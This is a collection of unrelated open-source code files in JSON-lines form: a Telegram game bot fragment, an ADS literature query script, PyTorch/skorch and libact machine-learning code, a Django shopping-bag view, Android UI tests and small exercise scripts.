\"scissors\"\n ]]}\n \n self.bot.sendMessage(user, \"You want to play \"\n \"rock, paper, scissors?\\n\"\n \"Okay, make your choice:\",\n reply_markup = show_keyboard)\n\n return True\n\n if self.state == \"rps\" and text in [ \"rock\", \"paper\", \"scissors\" ]:\n self.finish_playing_rps(text, user)\n return True\n\n \n return False\n\n\n\n def finish_playing_rps(self, user_choice, user):\n my_choice = [ \"rock\", \"paper\", \"scissors\" ][random.randint(0, 2)]\n\n hide_keyboard = { \"hide_keyboard\" : True }\n self.bot.sendMessage(user, \"I choose %s\" % my_choice,\n reply_markup = hide_keyboard)\n\n if ((my_choice == \"rock\" and user_choice == \"paper\") or\n (my_choice == \"paper\" and user_choice == \"scissors\") or\n (my_choice == \"scissors\" and user_choice == \"rock\")):\n self.bot.sendMessage(user, \"You win!\")\n else:\n self.bot.sendMessage(user, \"I win!\")\n \n self.state = None\n \n","sub_path":"eb_telegram.py","file_name":"eb_telegram.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"176603694","text":"import os\nimport requests\nimport json\nimport numpy\n\nADS_KEY = os.environ[\"ADS_API_KEY\"]\nBASE_URL = \"https://api.adsabs.harvard.edu/v1/search/query\"\n\n\ndef query_acknowledgments(word):\n # Set query parameters\n params = {\n 'q': 'ack:{0:s},property:REFEREED'.format(word),\n 'fl': 'pubdate',\n 'rows': '200',\n 'start': 0,\n }\n pub_years = []\n while True:\n # Execute the query\n headers = 
{'Authorization': 'Bearer:' + ADS_KEY}\n r = requests.get(BASE_URL, params=params, headers=headers)\n\n # Check if anything went wrong\n if r.status_code != requests.codes.ok:\n e = json.loads(r.text)\n perror = \"Error retrieving results: {0:s}\\n\".format(e['error'])\n sys.stderr.write(perror)\n continue\n\n # Extract results\n data = json.loads(r.text)\n for d in data['response']['docs']:\n pub_years.append(float(d['pubdate'].split('-')[0]))\n\n # Update starting point\n params['start'] += 200\n\n # Check if finished\n if params['start'] >= data[\"response\"][\"numFound\"]:\n break\n return numpy.array(pub_years)\n\n\ndef total_number(year):\n params = {\n 'q': 'pubdate:{0:s},property:REFEREED'.format(year),\n 'rows': 1\n }\n headers = {'Authorization': 'Bearer:' + ADS_KEY}\n r = requests.get(BASE_URL, params=params, headers=headers)\n data = json.loads(r.text)\n return data[\"response\"][\"numFound\"]\n\n\nYEARS = list(range(1995, 2017))\nTOTAL_COUNT = []\nfor year in YEARS:\n date = '{0:04d}'.format(year)\n TOTAL_COUNT.append(total_number(date))\nTOTAL_COUNT = numpy.array(TOTAL_COUNT)\n\n\ndef plot_yearly_trend(keyword, label=None):\n pub_years = query_acknowledgments(keyword)\n query_count = numpy.array([numpy.sum(pub_years == year) for year in YEARS])\n","sub_path":"ads-api.py","file_name":"ads-api.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22913625","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom hyperopt import hp\nfrom hyperopt.pyll import scope\nfrom sklearn.datasets import make_classification\nfrom skorch import NeuralNetRegressor\nfrom skorch.callbacks import EarlyStopping, LRScheduler, EpochScoring\nfrom skorch.dataset import CVSplit\nfrom torch import nn\nfrom torch.optim import lr_scheduler\n\nfrom config import RANDOM_STATE\nfrom utils import NonTreeBasedModel\n\n\nclass AdvancedNeuralNetworkModel(NonTreeBasedModel):\n @classmethod\n def prepare_dataset(cls, train_data, test_data, categorical_features):\n (X_train, y_train, *other), (X_test, y_test) = \\\n super(AdvancedNeuralNetworkModel, cls).prepare_dataset(train_data, test_data,\n categorical_features)\n return ((X_train.astype(np.float32), y_train.astype(np.float32).reshape((-1, 1)), *other),\n (X_test.astype(np.float32), y_test.astype(np.float32).reshape((-1, 1))))\n\n @staticmethod\n def build_estimator(hyperparams, train_data, test=False):\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n # Extract info from training data\n X, y, *_ = train_data\n in_features = X.shape[1]\n\n callbacks = [\n ('r2_score_valid', EpochScoring('r2',\n lower_is_better=False)),\n ('early_stopping', EarlyStopping(monitor='valid_loss',\n patience=5,\n lower_is_better=True)),\n ('learning_rate_scheduler', LRScheduler(policy=lr_scheduler.ReduceLROnPlateau,\n monitor='valid_loss',\n # Following kargs are passed to the\n # lr scheduler constructor\n mode='min',\n min_lr=1e-5\n )),\n ]\n\n return NeuralNetRegressor(\n NNModule,\n criterion=nn.MSELoss,\n optimizer=torch.optim.SGD,\n max_epochs=300,\n iterator_train__shuffle=True, # Shuffle training data on each epoch\n callbacks=callbacks,\n device=device,\n train_split=CVSplit(cv=5, random_state=RANDOM_STATE),\n lr=hyperparams['lr'],\n batch_size=hyperparams['batch_size'],\n module__in_features=in_features,\n module__n_layers=hyperparams['n_layers'],\n module__n_neuron_per_layer=hyperparams['n_neuron_per_layer'],\n module__activation=getattr(F, 
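# resolve the activation function by name from torch.nn.functional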
hyperparams['activation']),\n module__p_dropout=hyperparams['p_dropout'],\n optimizer__momentum=hyperparams['momentum'],\n optimizer__weight_decay=hyperparams['weight_decay'],\n optimizer__nesterov=True,\n verbose=3,\n iterator_train__num_workers=4,\n iterator_valid__num_workers=4\n )\n\n hp_space = {\n 'lr': hp.loguniform('learning_rate', np.log(1e-4), np.log(1e-1)),\n 'batch_size': 128,\n 'n_neuron_per_layer': scope.int(hp.quniform('layer_size', 10, 100, 3)),\n 'activation': hp.choice('activation', ['relu', 'leaky_relu', 'selu']),\n 'p_dropout': hp.uniform('p_dropout', 0.0, 0.5),\n 'momentum': hp.uniform('momentum', 0.87, 0.99),\n 'weight_decay': hp.loguniform('alpha', np.log(1e-7), np.log(1e-2)),\n 'n_layers': hp.choice('n_layers', [2, 3, 4, 5])\n }\n\nclass NNModule(nn.Module):\n def __init__(self,\n in_features,\n n_layers,\n n_neuron_per_layer=10,\n activation=F.relu,\n p_dropout=0.5):\n super(NNModule, self).__init__()\n\n self.first_layer = Layer(in_features, n_neuron_per_layer, activation, p_dropout)\n self.middle_layers = ListModule(self, 'middle_layer')\n for _ in range(n_layers-2):\n self.middle_layers.append(\n Layer(n_neuron_per_layer, n_neuron_per_layer, activation, p_dropout))\n self.fc = nn.Linear(n_neuron_per_layer, 1)\n\n def forward(self, X, **kwargs):\n X = self.first_layer(X)\n for layer in self.middle_layers:\n X = layer(X)\n X = self.fc(X)\n return X\n\nclass Layer(nn.Module):\n def __init__(self, in_features, out_feature, activation, p_dropout):\n super(Layer, self).__init__()\n self.dense = nn.Linear(in_features, out_feature)\n self.dropout = nn.Dropout(p_dropout)\n self.activation = activation\n self.batchnorm = nn.BatchNorm1d(out_feature)\n\n def forward(self, X):\n X = self.dense(X)\n X = self.activation(X)\n X = self.dropout(X)\n return X\n\nclass ListModule(object):\n def __init__(self, module, prefix, *args):\n self.module = module\n self.prefix = prefix\n self.num_module = 0\n for new_module in args:\n self.append(new_module)\n\n def append(self, new_module):\n if not isinstance(new_module, nn.Module):\n raise ValueError('Not a Module')\n else:\n self.module.add_module(self.prefix + str(self.num_module), new_module)\n self.num_module += 1\n\n def __len__(self):\n return self.num_module\n\n def __getitem__(self, i):\n if i < 0 or i >= self.num_module:\n raise IndexError('Out of bound')\n return getattr(self.module, self.prefix + str(i))\n","sub_path":"regression/models/advanced_neural_network.py","file_name":"advanced_neural_network.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386783356","text":"\nimport pyblish.api\nfrom reveries.maya.plugins import MayaSelectInvalidInstanceAction\n\n\nclass SelectInvalid(MayaSelectInvalidInstanceAction):\n\n label = \"Select Invalid Instance\"\n\n\nclass ValidateDeadlineMayaScheduling(pyblish.api.InstancePlugin):\n\n label = \"Deadline Scheduling\"\n order = pyblish.api.ValidatorOrder + 0.1\n hosts = [\"maya\"]\n\n targets = [\"deadline\"]\n\n families = [\n \"reveries.pointcache\",\n \"reveries.standin\",\n \"reveries.renderlayer\",\n ]\n actions = [\n pyblish.api.Category(\"Select\"),\n SelectInvalid,\n ]\n\n @classmethod\n def get_invalid(cls, instance):\n cls.log.debug(\"Selecting %s\" % instance.data[\"objectName\"])\n return [instance.data[\"objectName\"]]\n\n def process(self, instance):\n\n priority_limit = 80\n priority = instance.data[\"deadlinePriority\"]\n assert priority <= priority_limit, (\"Deadline 
priority should not be \"\n \"greater than %d.\"\n \"\" % priority_limit)\n\n pool = instance.data[\"deadlinePool\"]\n assert not pool == \"none\", (\"Deadline pool did not set.\")\n","sub_path":"plugins/maya/publish/validate_deadline_maya_scheduling.py","file_name":"validate_deadline_maya_scheduling.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"264305527","text":"#!/usr/bin/env python3\n\"\"\"\nThis script simulates real world use of active learning algorithms. Which in the\nstart, there are only a small fraction of samples are labeled. During active\nlearing process active learning algorithm (QueryStrategy) will choose a sample\nfrom unlabeled samples to ask the oracle to give this sample a label (Labeler).\n\nIn this example, ther dataset are from the digits dataset from sklearn. User\nwould have to label each sample choosed by QueryStrategy by hand. Human would\nlabel each selected sample through InteractiveLabeler. Then we will compare the\nperformance of using UncertaintySampling and RandomSampling under\nLogisticRegression.\n\"\"\"\n\nimport copy\nimport argparse\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, confusion_matrix, recall_score\n\n\n# project dependencies\nsys.path.insert(0, 'python') # path to the module.\n\n# keras\n# from keras.preprocessing.text import Tokenizer\n# from keras.preprocessing.sequence import pad_sequences\n# from keras.utils import to_categorical\n\n# libact classes\nfrom libact.base.dataset import Dataset\nfrom libact.models import LogisticRegression\nfrom libact.query_strategies import UncertaintySampling, RandomSampling\nfrom libact.labelers import InteractiveLabeler, IdealLabeler\n\n# demo utils\nfrom utils import *\nfrom libact_utils.labeler import InteractivePaperLabeler\n\n\n# parse arguments if available\nparser = argparse.ArgumentParser(description='Active learning parameters')\n\n# the number of iterations\nparser.add_argument(\n \"--quota\", type=int, default=10, help=\"The number of queries\")\n\n# interactive or not\nparser.add_argument('--interactive', dest='interactive', action='store_true',\n help=\"Interactive or not?\")\nparser.add_argument('--no-interactive', dest='interactive',\n action='store_false')\nparser.set_defaults(interactive=False)\n\n# type of model\nparser.add_argument('--model', type=str,\n default='MultinomialNB',\n help=\"The sklearn model to use for classification.\")\n\n\ndef get_indices_labeled_entries(dataset):\n \"\"\"Get labeled indices\"\"\"\n\n return [idx for idx, entry in enumerate(dataset.data) if entry[1] is not None]\n\n\n# def tranform_text_data(texts):\n# \n# # tokenizer\n# tokenizer = Tokenizer()\n# tokenizer.fit_on_texts(texts)\n# \n# sequences = tokenizer.texts_to_sequences(texts)\n# data = pad_sequences(sequences,\n# maxlen=maxlen,\n# padding='post', truncating='post')\n# \n# return data, tokenizer.word_index\n# \n\ndef make_pool(X, y, prelabeled=np.arange(5)):\n \"\"\"Function to split dataset into train and test dataset.\n\n Arguments\n ---------\n\n prelabeled: list\n List of indices for which the label is already available.\n\n \"\"\"\n\n # a set of labels is already labeled by the oracle\n y_train_labeled = np.array([None] * len(y))\n y_train_labeled[prelabeled] = y[prelabeled]\n\n # we are making a pool of the train data\n # the 'prelabeled' labels of the 
dataset are already labeled.\n return Dataset(X, y_train_labeled), Dataset(X, y)\n\n\ndef main(args):\n\n acc_pool = []\n maxlen = 100\n\n # get the texts and their corresponding labels\n texts, labels = load_ptsd_data()\n\n # Keras example\n # # transform data into matrix of integers\n # tokenizer = Tokenizer()\n # tokenizer.fit_on_texts(texts)\n # sequences = tokenizer.texts_to_sequences(texts)\n # data = pad_sequences(sequences,\n # maxlen=maxlen,\n # padding='post', truncating='post')\n\n from sklearn.feature_extraction.text import CountVectorizer\n from sklearn.feature_extraction.text import TfidfTransformer\n from libact.models import SklearnProbaAdapter, SklearnAdapter\n\n from sklearn.naive_bayes import MultinomialNB\n from sklearn.svm import SVC\n from sklearn.linear_model import LogisticRegression\n\n # count words\n count_vect = CountVectorizer(max_features=5000, stop_words='english')\n features = count_vect.fit_transform(texts).todense().tolist()\n \n \n # import pdb; pdb.set_trace()\n if 0:\n # tf-idf\n tfidf_transformer = TfidfTransformer()\n features = tfidf_transformer.fit_transform(features)\n \n\n pool, pool_ideal = make_pool(\n features, labels,\n prelabeled=[1, 2, 3, 4, 5, 218, 260, 466, 532, 564]\n )\n\n # get the model\n if args.model.lower() in ['multinomialnb', 'nb']:\n sklearn_model = MultinomialNB\n kwargs_model = {}\n elif args.model.lower() == 'svc':\n sklearn_model = SVC\n kwargs_model = {\n 'probability': True,\n # 'class_weight': {0: 1, 1: 100}\n 'class_weight': 'balanced' \n }\n elif args.model.lower() == 'logisticregression':\n sklearn_model = LogisticRegression\n kwargs_model = {}\n else:\n raise ValueError('Model not found.')\n\n # initialize the model through the adapter\n model = SklearnProbaAdapter(sklearn_model(**kwargs_model))\n\n # query strategy\n # https://libact.readthedocs.io/en/latest/libact.query_strategies.html\n # #libact-query-strategies-uncertainty-sampling-module\n #\n # least confidence (lc), it queries the instance whose posterior\n # probability of being positive is nearest 0.5 (for binary\n # classification); smallest margin (sm), it queries the instance whose\n # posterior probability gap between the most and the second probable\n # labels is minimal\n qs = UncertaintySampling(\n pool, method='lc', model=SklearnProbaAdapter(sklearn_model(**kwargs_model)))\n\n # The passive learning model. The model given in the query strategy is not\n # the same. Have a look at this one.\n # model = LogisticRegression()\n\n fig, ax = plt.subplots()\n ax.set_xlabel('Number of Queries')\n ax.set_ylabel('Value')\n\n # Train the model on the train dataset.\n model.train(pool)\n\n # the accuracy of the entire pool\n acc_pool = np.append(\n acc_pool,\n model._model.score([x[0] for x in pool.get_entries()], labels)\n )\n\n # make plot\n query_num = np.arange(0, 1)\n p2, = ax.plot(query_num, acc_pool, 'r', label='Accuracy')\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05), fancybox=True,\n shadow=True, ncol=5)\n plt.show(block=False)\n\n # Give each label its name (labels are from 0 to n_classes-1)\n if args.interactive:\n lbr = InteractivePaperLabeler(label_name=[\"0\", \"1\"])\n else:\n lbr = IdealLabeler(dataset=pool_ideal)\n\n query_i = 1\n\n while query_i <= args.quota:\n\n # make a query from the pool\n print(\"Asking sample from pool with Uncertainty Sampling\")\n ask_id = qs.make_query()\n print(\"Index {} returned. 
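# Editor's note: a hedged sketch of the least-confidence ('lc') criterion
# described in the comment block above, written against plain scikit-learn
# rather than the libact adapter; data and names are illustrative.
import numpy as np
from sklearn.naive_bayes import MultinomialNB

X = np.array([[2, 0, 1], [0, 3, 0], [1, 1, 1], [0, 0, 4], [3, 1, 0]])
y = np.array([0, 1, -1, -1, -1])              # -1 marks an unlabelled sample here

labeled = y >= 0
clf = MultinomialNB().fit(X[labeled], y[labeled])

proba = clf.predict_proba(X[~labeled])
confidence = proba.max(axis=1)                # posterior of the most likely class
ask_id = np.flatnonzero(~labeled)[np.argmin(confidence)]
print("query sample", ask_id)                 # the sample the oracle is asked about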
True label is {}.\".format(\n ask_id, pool_ideal.data[ask_id][1]))\n\n # get the paper\n data_point = pool.data[ask_id][0]\n lb = lbr.label(data_point)\n\n # update the label in the train dataset\n pool.update(ask_id, lb)\n\n # train the model again\n model.train(pool)\n\n # append the score to the model\n acc_pool = np.append(\n acc_pool,\n model._model.score([x[0] for x in pool.get_entries()], labels)\n )\n\n # additional evaluations\n #pred = model.predict([x[0] for x in pool.get_entries()])\n\t\t\n idx_features = pool.get_unlabeled_entries()\n features = [x[1] for x in idx_features]\n idx= [x[0] for x in idx_features]\n pred = model.predict(features)\n\n print(confusion_matrix(labels[idx], pred))\n print(recall_score(labels[idx], pred))\n\n if args.interactive:\n # update plot\n ax.set_xlim((0, query_i))\n ax.set_ylim((0, max(acc_pool) + 0.2))\n p2.set_xdata(np.arange(0, query_i + 1))\n p2.set_ydata(acc_pool)\n plt.draw()\n\n # update the query counter\n query_i += 1\n\n if not args.interactive:\n # update plot\n ax.set_xlim((0, query_i - 1))\n ax.set_ylim((0, max(acc_pool) + 0.2))\n p2.set_xdata(np.arange(0, query_i))\n p2.set_ydata(acc_pool)\n plt.draw()\n\n print(acc_pool)\n\n input(\"Press any key to continue...\")\n\n\nif __name__ == '__main__':\n\n # parse all the arguments\n args = parser.parse_args()\n\n try:\n # start the active learning algorithm\n main(args)\n except KeyboardInterrupt:\n print('Closing down.')\n","sub_path":"deprecated/ptsd_active_classical.py","file_name":"ptsd_active_classical.py","file_ext":"py","file_size_in_byte":8625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"366480099","text":"from uiautomator import device as d\nimport unittest\nimport time\n\nclass CancelAddingContact(unittest.TestCase):\n def setUp(self):\n super(CancelAddingContact,self).setUp()\n\n def testCancelAddContact(self):\n #Launch Contacts\n d(text = 'People').click.wait()\n assert d(description = 'Favorites').wait.exists(timeout = 2000), 'Contacts launch failed'\n\n #Tap on add contact icon\n d(description = 'Add Contact').click.wait()\n assert d(description = 'contact photo').wait.exists(timeout = 2000), 'Add contact page does not pop up'\n\n #Cancel adding contact\n d(description = 'More options').click.wait()\n assert d(text = 'Join').wait.exists(timeout = 2000), 'Menu does not pop up'\n\n d(text = 'Discard').click.wait()\n assert d(description = 'Favorites').wait.exists(timeout = 2000), 'Contacts launch failed'\n\n #Exit activity\n d.press.back()\n d.press.back()\n\n assert d(text = 'People').wait.exists(timeout = 2000), 'Contacts does not exit in 2s'\n\n def tearDown(self):\n super(CancelAddingContact,self).tearDown()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"UA_test.py","file_name":"UA_test.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204518325","text":"from django.shortcuts import render, redirect, HttpResponse, get_object_or_404\nfrom django.contrib import messages\n\nfrom products.models import Product\n\n# Create your views here.\n\n\ndef view_bag(request):\n \"\"\" A view to return the bag content page \"\"\"\n\n return render(request, 'bag/bag.html')\n\n\ndef add_to_bag(request, item_id):\n \"\"\" Add a quantity of the specified product to the shopping bag \"\"\"\n\n product = get_object_or_404(Product, pk=item_id)\n quantity = int(request.POST.get('quantity'))\n redirect_url = 
request.POST.get('redirect_url')\n bag = request.session.get('bag', {})\n\n if item_id in list(bag.keys()):\n bag[item_id] += quantity\n messages.success(\n request, f'Updated {product.name} quantity to {bag[item_id]}')\n else:\n bag[item_id] = quantity\n messages.success(request, f'{product.name} added to basket')\n\n request.session['bag'] = bag\n return redirect(redirect_url)\n\n\ndef remove_from_bag(request, item_id):\n \"\"\"Remove the item from the shopping bag\"\"\"\n\n try:\n product = get_object_or_404(Product, pk=item_id)\n bag = request.session.get('bag', {})\n\n if bag[item_id]:\n del bag[item_id]\n messages.success(request, f'{product.name} removed from basket')\n else:\n bag.pop(item_id)\n messages.success(request, f'{product.name} removed from basket')\n\n request.session['bag'] = bag\n return HttpResponse(status=200)\n\n except Exception as e:\n messages.error(request, f'Oops! Removing item failed: {e}')\n return HttpResponse(status=500)\n","sub_path":"bag/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"213074831","text":"#calcular la media de 4 notas\r\nprint (\"Bienvenido!!!\")\r\nnota_1= int(input(\"Porfavor Ingrese la Nota 1: \"))\r\nnota_2= int(input(\"Ahora la Nota 2: \"))\r\nnota_3= int(input(\"La Nota 3: \"))\r\nnota_4= int(input(\"Y por ultimo Ingrese la Nota 4: \"))\r\npromedio= nota_1+nota_2+nota_3+nota_4\r\nif promedio/4 <= 10:\r\n\tprint (\"Usted esta reprobado\")\r\nelse:\r\n\tprint (\"Usted Aprobo el Curso!!!\")\r\n\r\nprint (\"El promedio de sus notas es: \",promedio/4)","sub_path":"notas.py","file_name":"notas.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"613204871","text":"while True:\n\ttry:\n\t\tlst = list(map(int,raw_input().strip().split(',')))\n\t\tleft_num = 0\n\t\tflag = True\n\t\tfor l in lst:\n\t\t\tfor b in range(7,-1,-1):\n\t\t\t\tif l>>b&1 == 0:\n\t\t\t\t\tbreak\n\t\t\tif b == 7:\n\t\t\t\tif left_num == 0:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tflag = False\n\t\t\t\t\tbreak\n\t\t\telif b < 6:\n\t\t\t\tif left_num == 0:\n\t\t\t\t\tleft_num = 6 - b\n\t\t\t\telse:\n\t\t\t\t\tflag = False\n\t\t\t\t\tbreak\n\t\t\telif b == 6:\n\t\t\t\tif left_num > 0:\n\t\t\t\t\tleft_num -= 1\n\t\t\t\telse:\n\t\t\t\t\tflag = False\n\t\t\t\t\tbreak\n\n\t\tif left_num > 0:\n\t\t\tflag = False\n\t\tif flag:\n\t\t\tprint('true')\n\t\telse:\n\t\t\tprint('false')\n\texcept:\n\t\tbreak\n","sub_path":"niuke/118.py","file_name":"118.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"281517294","text":"#23min\r\nclass Solution:\r\n def numSmallerByFrequency(self, queries: List[str], words: List[str]) -> List[int]:\r\n # copy\r\n # 就是先统计words中字符串最小字母出现频次,然后将它排序得到w数组。这样我们在统计queries中字符串最小字母出现频次i的时候,这样我们就可以通过upper_bound计算出在w中比i大的第一个位置。\r\n # w = sorted([i.count(min(i)) for i in words])\r\n # return [len(w) - bisect.bisect_right(w, i.count(min(i))) for i in queries]#返回bisect_right将会插入的位置\r\n # copy2\r\n q = [i.count(min(i)) for i in queries]\r\n w = [i.count(min(i)) for i in words]\r\n res = []\r\n\r\n for i in range(len(queries)):\r\n k = 0\r\n for j in range(len(words)):\r\n if q[i] < w[j]:\r\n k += 1\r\n res.append(k)\r\n return res\r\n\r\n# # 3<4 2<3或者4(2个)#超时\r\n# def f(word):\r\n# a=sorted(word)\r\n# count=1\r\n# i=0\r\n# if 
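# Editor's note: the bit-twiddling validator above classifies each byte of a
# UTF-8 stream by its count of leading 1-bits. A compact sketch of that rule:
def leading_ones(byte):
    """0 for ASCII, 1 for a continuation byte (0b10xxxxxx),
    2-4 for the lead byte of a multi-byte sequence."""
    count = 0
    for b in range(7, -1, -1):
        if byte >> b & 1:
            count += 1
        else:
            break
    return count

assert leading_ones(0b01111111) == 0   # ASCII byte
assert leading_ones(0b10111111) == 1   # continuation byte
assert leading_ones(0b11100000) == 3   # lead byte: expect two continuations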
len(word)==1:return 1 #忽略了\r\n# while if(q):\r\n# answer.append(len(b[i:]))\r\n# break\r\n\r\n# return answer","sub_path":"leetcode_solution/leetcode类别/10字符串/简单/1170. 比较字符串最小字母出现频次.py","file_name":"1170. 比较字符串最小字母出现频次.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12093963","text":"# -*- coding: utf-8 -*-\nfrom OurModelVerify import ChunkVerify\nfrom OurModelVerify import ErrorVerify\nfrom OurModelVerify import EveryChunkUnion\n\nclass Verify():\n def __init__(self, name):\n self.name = name\n\n def all_verify(self):\n # 19折交叉检验\n for chunk_number in range(1, 20):\n thread = ChunkVerify.VerifyClass(str(chunk_number) + \"号交叉检验法\",\n chunk_number, \"./VerifyOutPut/\")\n thread.start()\n thread.join()\n # 归并交叉检验结果\n chunk_union = EveryChunkUnion.EveryChunkUnionClass(\"./VerifyOutPut/\", \"./VerifyUnion/\")\n chunk_union.union()\n # 计算误差\n error_verify = ErrorVerify.ErrorVerifyClass(\"./VerifyUnion/ranks_result.csv\", \"./VerifyError/\")\n error_verify.error_verify()\n\nif __name__ == '__main__':\n verify = Verify(\"合并检验\")\n verify.all_verify()","sub_path":"OurModelVerify/Verify.py","file_name":"Verify.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"445975940","text":"import keras.backend as K\n\nMARGIN = 1.\n\n# Refer to https://github.com/maciejkula/triplet_recommendations_keras\n\ndef identity_loss(y_true, y_pred):\n return K.mean(y_pred - 0 * y_true)\n\ndef triplet_loss(vects):\n # f_anchor.shape = (batch_size, 256)\n f_anchor, f_positive, f_negative = vects\n # L2 normalize anchor, positive and negative, otherwise,\n # the loss will result in ''nan''!\n f_anchor = K.l2_normalize(f_anchors, axis = -1)\n f_positive = K.l2_normalize(f_positive, axis = -1)\n f_negative = K.l2_normalize(f_negative, axis = -1)\n\n dis_anchor_positive = K.sum(K.square(K.abs(f_anchor - f_positive)),\n axis = -1, keepdims = True)\n\n dis_anchor_negative = K.sum(K.square(K.abs(f_anchor - f_negative)),\n axis = -1, keepdims = True)\n loss = dis_anchor_positive + MARGIN - dis_anchor_negative \n return loss\n","sub_path":"DeepLearning/ComputerVision/VehicleReID/Code/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"596050754","text":"import random as rd\nimport numpy as np\n\n\"\"\"\nUse case\n myData = Data('../ml-1m/ratings.dat')\n myData.split(0.8)\n \n # while training\n X, Y, _, _ = myData.get_batch_train(512, 20)\n \n # after an epoch\n myData.shuffle_train()\n myData.renew_train()\n \n\"\"\"\n\n\nclass Data:\n\n def __init__(self, data_directory):\n self.userList = {}\n self.movieID2index = {}\n index = 0\n self.used_train = 0\n self.used_test = 0\n\n with open(data_directory, 'r') as f:\n for line in f.readlines():\n userID, movieID, rating, timeStamp = line.split('::')\n timeStamp = timeStamp.strip()\n if int(movieID) not in self.movieID2index:\n self.movieID2index[int(movieID)] = index\n index += 1\n if userID in self.userList:\n self.userList[userID].append((int(movieID), int(rating), int(timeStamp)))\n else:\n self.userList[userID] = [(int(movieID), int(rating), int(timeStamp))]\n self.movieDim = len(self.movieID2index)\n\n # sort rating triples for each user according to time stamp\n for key in self.userList:\n ratingsTriples = self.userList[key]\n ratingsTriplesSorted = 
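# Editor's note: a numpy sketch of the margin triplet loss computed in loss.py
# above: L2-normalize the three embeddings, then d(a,p) + MARGIN - d(a,n).
# Values are illustrative; a lower score means the anchor sits closer to the
# positive than to the negative.
import numpy as np

MARGIN = 1.0

def l2_normalize(v):
    return v / np.linalg.norm(v, axis=-1, keepdims=True)

def triplet_loss(anchor, positive, negative):
    a, p, n = (l2_normalize(x) for x in (anchor, positive, negative))
    d_ap = np.sum((a - p) ** 2, axis=-1)      # squared distance anchor-positive
    d_an = np.sum((a - n) ** 2, axis=-1)      # squared distance anchor-negative
    return d_ap + MARGIN - d_an

a = np.array([[1.0, 0.0]])
p = np.array([[0.9, 0.1]])
n = np.array([[0.0, 1.0]])
print(triplet_loss(a, p, n))                  # well below MARGIN: an easy triplet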
sorted(ratingsTriples, key=lambda x: x[2])\n self.userList[key] = ratingsTriplesSorted\n self.user = len(self.userList)\n\n def split(self, ratio_train):\n all_users = list(self.userList.keys())\n self.train_users = all_users[0: int(ratio_train * self.user)]\n self.test_users = all_users[int(ratio_train * self.user):]\n\n def shuffle_train(self):\n rd.shuffle(self.train_users)\n\n def get_batch_train(self, batch_size, sequence_len):\n \"\"\"return X(batch * seq), Y(batch * movie), output_mask(batch * movie), flag\"\"\"\n if batch_size + self.used_train >= len(self.train_users):\n return None, None, None, False\n X, Y = self.construct_matrix(self.train_users[self.used_train: self.used_train+batch_size], sequence_len, batch_size)\n output_mask = Y > 0\n self.used_train += batch_size\n return X, Y, output_mask, True\n\n def get_batch_test(self, batch_size, sequence_len):\n \"\"\"return X(batch * seq), Y(batch * movie), output_mask(batch * movie), flag\"\"\"\n if batch_size + self.used_test >= len(self.test_users):\n return None, None, None, False\n X, Y = self.construct_matrix(self.test_users[self.used_test: self.used_test+batch_size], sequence_len, batch_size)\n output_mask = Y > 0\n self.used_test += batch_size\n return X, Y, output_mask, True\n\n def renew_train(self):\n self.used_train = 0\n rd.shuffle(self.train_users)\n\n def renew_test(self):\n self.used_test = 0\n rd.shuffle(self.test_users)\n\n def rating_coding(self, rating_list, seq_len):\n \"\"\"\n The rating_list is already in time order\n return a 1 * seq_len matrix\n \"\"\"\n output = np.ones((1, seq_len)) * (-1)\n if len(rating_list) > seq_len:\n rating_list = rating_list[len(rating_list) - seq_len:]\n\n for i in range(seq_len - len(rating_list), seq_len):\n output[0, i] = self.movie2ratingid(rating_list[i-(seq_len - len(rating_list))][0], rating_list[i- (seq_len - len(rating_list))][1], self.movieDim)\n return output\n\n def movie2ratingid(self, movie_id, rating, number_movie):\n return (rating - 1) * number_movie + self.movieID2index[movie_id]\n\n def left2vector(self, ratings):\n \"\"\"Return a 1 * movie matrix\"\"\"\n output = np.zeros((1, self.movieDim))\n for rating in ratings:\n output[0, self.movieID2index[rating[0]]] = rating[1]\n return output\n\n def construct_matrix(self, users, seq_len, batch_size):\n \"\"\"\n :param users: list of keys in self.userList(Dict), which contains all triples of certain user\n :param seq_len:\n :return: X(batch * seq), Y(batch * movie)\n \"\"\"\n matrix_X = np.zeros((batch_size, seq_len))\n matrix_Y = np.zeros((batch_size, self.movieDim))\n i = 0\n for user in users:\n splitPoint = rd.randint(1, len(self.userList[user]) - 1)\n matrix_X[i] = self.rating_coding(self.userList[user][0: splitPoint-1], seq_len)\n matrix_Y[i] = self.left2vector(self.userList[user][splitPoint-1:])\n i += 1\n\n return matrix_X, 